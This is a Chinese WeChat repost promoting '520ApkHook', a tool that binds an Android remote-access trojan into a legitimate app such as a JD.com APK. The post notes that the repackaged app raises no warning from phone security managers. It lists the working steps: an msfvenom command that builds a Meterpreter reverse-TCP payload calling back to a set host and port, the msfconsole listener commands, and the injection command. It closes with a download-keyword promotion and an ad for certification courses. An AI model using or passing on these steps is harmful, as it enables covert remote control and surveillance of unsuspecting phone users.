現(xiàn)在只對常讀和星標的公眾號才展示大圖推送,建議大家把Hack分享吧“設(shè)為星標”,否則可能看不到了!
工具介紹
這次分享的工具類似于捆綁工具,將安卓遠控Apk注入進普通的App中,運行新生成的App時,普通App正常運行,遠控也正常上線。
注:開發(fā)所使用的java版本為java11,或者嘗試使用java11以上版本運行。
其他優(yōu)點:
1. 注入后的app在安裝時,手機管家不會有任何安全提示,普通的遠控程序,安裝時手機管家會有安全警示。
2. 理論上來說,只要遠控軟件使用的是純Java或者Kotlin編寫,就可以使用,不一定必須是msf生成的apk。
工具使用
1. 下載Releases中打包好的jar包
2. msfvenom(生成apk木馬)
msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk
3. msfconsole(設(shè)置監(jiān)聽參數(shù))
use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 3306set exitonsession falseexploit -j
4. 520ApkHook(注入正常Apk)
java -jar a520ApkHook-1.0-jar-with-dependencies.jar ~/Downloads/京東.apk ~/Downloads/msf.apk
工具參數(shù):
下載地址
點擊下方名片進入公眾號
回復(fù)關(guān)鍵字【230607】獲取下載鏈接
信 安 考 證
需要考以下各類安全證書的可以聯(lián)系我,價格優(yōu)惠、組團更便宜,還送【瀟湘信安】知識星球1年!
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請
點擊舉報。